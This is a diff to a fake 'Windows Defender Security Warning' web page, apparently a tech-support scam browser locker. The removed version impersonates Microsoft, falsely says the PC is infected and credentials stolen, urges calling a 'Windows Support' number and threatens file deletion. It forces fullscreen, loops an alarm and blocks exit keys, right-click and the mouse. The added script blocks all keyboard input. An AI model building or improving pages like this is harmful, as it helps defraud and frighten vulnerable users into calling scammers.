--- a/windows_defender_warning.html
+++ b/windows_defender_warning.html
@@ -1,237 +1,20 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-  <meta charset="UTF-8">
-  <title>Windows Defender Security Warning</title>
-  <style>
-    html, body {
-      margin: 0;
-      padding: 0;
-      width: 100vw;
-      height: 100vh;
-      background: #e7eefc;
-      font-family: 'Segoe UI', Arial, sans-serif;
-      user-select: none;
-      overflow: hidden;
-      cursor: none;
-    }
-    .fullscreen-prompt {
-      position: fixed;
-      inset: 0;
-      background: #1877d5;
-      color: #fff;
-      z-index: 2000;
-      display: flex;
-      align-items: center;
-      justify-content: center;
-      flex-direction: column;
-      font-size: 1.6em;
-      text-align: center;
-      cursor: pointer;
-    }
-    .fullscreen-prompt span {
-      margin-top: 18px;
-      font-size: 0.7em;
-      color: #c8e2ff;
-    }
-    .overlay-blue {
-      position: fixed;
-      top: 0; left: 0; right: 0;
-      background: #1877d5;
-      color: #fff;
-      padding: 18px;
-      z-index: 999;
-      text-align: center;
-      font-size: 1.25em;
-      font-weight: 500;
-      box-shadow: 0 4px 10px #0003;
-    }
-    .center-window {
-      position: fixed;
-      top: 50%; left: 50%;
-      transform: translate(-50%, -50%);
-      background: #fff;
-      border-radius: 8px;
-      box-shadow: 0 10px 34px #0005;
-      width: 500px;
-      max-width: 97vw;
-      padding: 32px 34px 24px 34px;
-      z-index: 1000;
-      text-align: left;
-    }
-    .center-window h2 {
-      color: #2a4887;
-      font-weight: 600;
-      margin-bottom: 18px;
-      letter-spacing: 0.01em;
-    }
-    .threat {
-      color: #cc222a;
-      font-weight: bold;
-      margin-bottom: 8px;
-      font-size: 1.1em;
-    }
-    .icon-row {
-      display: flex;
-      gap: 22px;
-      justify-content: center;
-      margin-bottom: 19px;
-    }
-    .icon-row img {
-      height: 38px;
-      width: 38px;
-      filter: grayscale(0.5);
-    }
-    .block-note {
-      font-size: 1em;
-      color: #b21d1d;
-      background: #f7e3e3;
-      border: 1.5px solid #d89e9e;
-      border-radius: 6px;
-      padding: 10px 12px;
-      margin: 12px 0 22px 0;
-    }
-    .support {
-      color: #233a6a;
-      background: #e7eefc;
-      font-size: 1.08em;
-      margin: 0;
-    }
-    .buttons-row, .close, .minimize, .maximize {
-      display: none !important;
-    }
-    .ms-logo {
-      margin-right: 6px;
-      width: 27px;
-      vertical-align: middle;
-    }
-    @media (max-width:600px) {
-      .center-window { padding: 18px 8px 12px 8px; width: 97vw; }
-    }
-  </style>
-  <script>
-    function goFullscreen() {
-      let el = document.documentElement;
-      if (el.requestFullscreen) return el.requestFullscreen();
-      if (el.webkitRequestFullscreen) return el.webkitRequestFullscreen();
-      if (el.msRequestFullscreen) return el.msRequestFullscreen();
-    }
+<script>
+  // This blocks nearly all key events, but not browser/system shortcuts
+  document.addEventListener('keydown', function(e) {
+    e.preventDefault();
+    e.stopPropagation();
+    return false;
+  }, true);
 
-    function showPrompt() {
-      const p = document.getElementById('fs-prompt');
-      if (p) p.style.display = 'flex';
-    }
-    function hidePrompt() {
-      const p = document.getElementById('fs-prompt');
-      if (p) p.style.display = 'none';
-    }
+  document.addEventListener('keypress', function(e) {
+    e.preventDefault();
+    e.stopPropagation();
+    return false;
+  }, true);
 
-    function attemptFullscreen() {
-      goFullscreen();
-      hidePrompt();
-      playAlert();
-    }
-
-    function onFullscreenChange() {
-      if (
-        !document.fullscreenElement &&
-        !document.webkitFullscreenElement &&
-        !document.msFullscreenElement
-      ) {
-        showPrompt();
-      } else {
-        hidePrompt();
-      }
-    }
-
-    // --- Sound effect logic ---
-    let soundPlayed = false;
-    function playAlert() {
-      if (!soundPlayed) {
-        const audio = document.getElementById('alertSound');
-        if (audio) {
-          audio.volume = 0.35;
-          audio.play();
-          soundPlayed = true;
-        }
-      }
-    }
-
-    // --- Block user actions ---
-    document.addEventListener('contextmenu', e => e.preventDefault());
-    document.addEventListener('keydown', e => {
-      if (
-        ['Escape', 'F11', 'F5'].includes(e.key) ||
-        (e.ctrlKey && ['w','r'].includes(e.key.toLowerCase())) ||
-        (e.metaKey && ['w','r'].includes(e.key.toLowerCase())) ||
-        (e.altKey && e.key.toLowerCase() === 'f4')
-      ) {
-        e.preventDefault();
-        e.stopPropagation();
-        return false;
-      }
-    }, true);
-    document.addEventListener('mousedown', e => e.preventDefault());
-    document.onselectstart = () => false;
-
-    window.onload = () => {
-      // Show prompt overlay
-      showPrompt();
-
-      // Only allow fullscreen on user gesture (click or keydown)
-      const prompt = document.getElementById('fs-prompt');
-      prompt.addEventListener('click', attemptFullscreen);
-      prompt.addEventListener('keydown', attemptFullscreen);
-      // Focus for keydown to work
-      prompt.setAttribute('tabindex', '0');
-      prompt.focus();
-
-      // Listen for fullscreen exit
-      document.addEventListener('fullscreenchange', onFullscreenChange);
-      document.addEventListener('webkitfullscreenchange', onFullscreenChange);
-      document.addEventListener('msfullscreenchange', onFullscreenChange);
-    };
-  </script>
-</head>
-<body>
-  <div id="fs-prompt" class="fullscreen-prompt" style="display:none;">
-    <div>
-      <b>SECURITY NOTICE</b><br><br>
-      This site requires fullscreen mode.<br>
-      <span>Click anywhere or press any key to continue.</span>
-    </div>
-  </div>
-  <div class="overlay-blue">
-    <b>Windows-Defender - Security Warning</b><br>
-    * ACCESS TO THIS PC HAS BEEN BLOCKED FOR SECURITY REASONS *<br>
-    Your computer has alerted us that it has been infected with a DOSAttack Spyware. The following data has been compromised.<br>
-    &gt; Email Credentials
-  </div>
-  <div class="center-window">
-    <h2>Windows Defender Security Center</h2>
-    <div class="threat">App: Ads.financetrack(2).dll<br>
-      Threat Detected: DOSAttack Spyware
-    </div>
-    <div class="icon-row">
-      <img src="https://upload.wikimedia.org/wikipedia/commons/2/2d/Windows_Defender_logo.png" title="Defender Icon" alt="Defender Icon"/>
-      <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" title="Microsoft Logo" alt="Microsoft Logo"/>
-      <img src="https://upload.wikimedia.org/wikipedia/commons/8/8c/Lock_icon.svg" title="Lock Icon" alt="Lock Icon"/>
-    </div>
-    <div class="block-note">
-      Access to this PC has been blocked for security reasons.<br>
-      <span class="support">
-        Contact Windows Support: <b>1-865-484-6972</b> (Toll Free)<br>
-      </span>
-      <small>
-        Note: If you think this Notification is by error, report immediately to Windows Support to halt the auto-deletion of files and applications from this computer. As this Computer ID is flagged and is connected over the internet Servers, files and apps deletion may start any moment.
-      </small>
-    </div>
-    <div style="margin-top:12px;">
-      <img class="ms-logo" src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft Logo" />
-      <span>Microsoft</span>
-    </div>
-  </div>
-  <!-- Alarm sound (royalty-free public URL) -->
-  <audio id="alertSound" src="https://cdn.pixabay.com/audio/2022/07/26/audio_124b9edab9.mp3" loop></audio>
-</body>
-</html>
+  document.addEventListener('keyup', function(e) {
+    e.preventDefault();
+    e.stopPropagation();
+    return false;
+  }, true);
+</script>
